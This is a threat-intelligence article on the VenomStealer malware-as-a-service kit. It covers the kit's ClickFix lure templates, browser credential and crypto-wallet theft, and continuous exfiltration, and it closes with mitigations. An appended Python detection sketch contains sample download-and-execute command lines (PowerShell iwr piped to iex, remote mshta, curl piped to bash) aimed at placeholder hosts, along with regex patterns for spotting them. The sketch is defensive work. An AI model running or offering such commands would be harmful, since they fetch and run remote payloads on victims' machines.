Managing exposure to ClickFix-style social engineering campaigns requires understanding how these threats are evolving. Recently, security researchers at BlackFog identified a newly distributed malware-as-a-service (MaaS) platform that automates the technical steps of these campaigns for threat actors.
Operating under the name "VenomStealer," the developer offers a MaaS platform on cybercriminal networks that allows operators to create a persistent, multistage execution flow. Based on the initial ClickFix user interaction, the software automates unauthorized access to credentials, cryptocurrency wallets, and ongoing data exfiltration.
According to BlackFog founder and CEO Darren Williams, Venom differentiates itself from commodity stealers like Lumma, Vidar, and RedLine by extending beyond a single credential harvesting event. The platform integrates ClickFix social engineering directly into its operator panel, automating the post-access sequence and establishing a continuous exfiltration pipeline that remains active after the initial execution package finishes running.
Marketed on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform operates on a subscription model, costing $250 a month or $1,800 for lifetime access. The operation includes a vetted application process, Telegram-based licensing, and a 15% affiliate program. The delivery mechanism relies on a native C++ binary compiled per-operator directly from the web panel.
Unlike traditional infostealers that execute once, transmit data, and exit, Venom Stealer continuously scans the affected system. It harvests credentials, session cookies, and browser data while targeting cryptocurrency wallets and stored secrets. The platform also automates wallet cracking and fund draining. The operation appears highly active, with the developer shipping multiple platform updates throughout March alone.
Step-by-step ClickFix execution
A campaign built with Venom Stealer begins when an individual lands on a deceptive ClickFix page hosted by the operator. The platform includes four templates for both Windows and macOS environments: a fake Cloudflare CAPTCHA, a fake OS update, a simulated SSL certificate error, and a fake font installation page. Each template instructs the user to open a Run dialog or Terminal window, copy and paste a specific command, and press Enter.
Because the user initiates the execution manually, the process appears as normal user activity, which frequently bypasses detection logic that relies on evaluating parent-child process relationships.
Available Windows execution packages in the kit include .exe, .ps1 (enabling fileless execution via PowerShell), .hta, and .bat options. For macOS environments, the templates utilize bash and curl. The platform allows operators to configure custom domains through Cloudflare DNS, ensuring the panel URL remains hidden from the command string copied by the user.
Once executed, the software scans every Chromium and Firefox-based browser on the machine. It extracts saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults across all browser profiles.
The execution sequence also includes specific evasion capabilities. For instance, Chrome's v10 and v20 password encryption is bypassed using a silent privilege escalation technique that extracts the decryption key without triggering a User Account Control (UAC) dialog, minimizing forensic artifacts. Additionally, the software captures system fingerprinting and browser extension inventories, compiling a comprehensive profile of the affected user.
This collected data leaves the infected device immediately, with little to no local staging or delay. Without adequate visibility into outbound network traffic, detecting this extraction phase is significantly more difficult for security teams.
Persistent data exfiltration pipeline
Upon discovering wallet data, the software transfers it to a server-side, GPU-powered cracking engine. This engine automatically cracks cryptocurrency wallets, including MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. A March 9 update to the platform introduced a File Password and Seed Finder, which searches the local filesystem for saved seed phrases and feeds any discovered data into the cracking pipeline.
Consequently, users who avoid saving credentials directly in their browsers still face exposure if seed phrases are stored anywhere on their local machine.
While some newer infostealer variants include persistence mechanisms, Venom Stealer maintains an active presence after the initial compromise. It continuously monitors Chrome's Login Data file, capturing newly saved credentials in real time. This mechanism undermines standard credential rotation as an incident response measure and extends the data exfiltration window, making it more challenging for security teams to determine the full scope of a security incident.
Reducing exposure to ClickFix campaigns
Security researchers from Proofpoint first identified ClickFix techniques roughly two years ago, and the methodology has since gained significant traction. The technique relies on instilling a sense of urgency—prompting users to fix an error or install an update—while using familiar, benign interfaces like CAPTCHA prompts to create a false sense of security. The primary goal is to trick the user into manually executing unauthorized commands.
Organizations can safeguard their environments and reduce exposure to threats like Venom Stealer by implementing several preventative controls:
Restrict PowerShell execution: Limit access to PowerShell for standard users and enforce strict execution policies.
Disable the Run dialog: Use Group Policy to remove the Run dialog for non-administrative users.
Enhance security awareness: Train employees to recognize ClickFix-style social engineering, specifically the danger of copying and pasting commands from web prompts into terminals.
Monitor outbound traffic: Because the sequence relies on data leaving the device, monitoring and controlling outbound traffic provides a critical opportunity to detect exfiltration activity and mitigate the impact of credential theft.
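As an added illustration (not code from BlackFog or the article), the following Python sketch shows the kind of command-line content check a detection team can layer on top of parent-child logic, since a ClickFix launch legitimately has explorer.exe or a terminal as its parent. The events are constructed Sysmon-style process-create records and the hostnames are placeholders.

```python
import re

# Constructed sample records in the shape of Sysmon Event ID 1 (process create).
# Illustrative only; the example.invalid hosts are placeholders, not real infrastructure.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/x | iex"'},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmd": "mshta https://example.invalid/verify.hta"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell Get-ChildItem C:\\Users"},
    {"parent": "services.exe", "image": "svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"parent": "Terminal", "image": "bash",
     "cmd": 'bash -c "curl -fsSL https://example.invalid/update.sh | bash"'},
]

# Interpreters a ClickFix lure tells the victim to drive from the Run dialog or a terminal.
USER_LAUNCHED_INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "bash", "zsh", "sh"}
# Parents meaning "a human typed or pasted this": exactly what parent-child heuristics treat as benign.
USER_SHELL_PARENTS = {"explorer.exe", "Terminal", "iTerm2"}

# Command-line traits typical of the .ps1 / .hta / curl-and-bash packages described above.
INDICATORS = {
    "download_cradle": re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|net\.webclient)\b", re.I),
    "remote_hta": re.compile(r"mshta\s+https?://", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "pipe_to_interpreter": re.compile(r"\|\s*(iex|invoke-expression|bash|sh)\b", re.I),
}


def clickfix_indicators(event):
    """Return the indicator names that fire for one process-create event."""
    if event["image"] not in USER_LAUNCHED_INTERPRETERS or event["parent"] not in USER_SHELL_PARENTS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmd"])]


def triage(events):
    """Return (index, indicators) for every event with at least one ClickFix indicator."""
    hits = []
    for i, ev in enumerate(events):
        found = clickfix_indicators(ev)
        if found:
            hits.append((i, found))
    return hits
```

An ordinary user-launched PowerShell command (event 2) is left alone, so the rule keys on what was pasted rather than on the parent process.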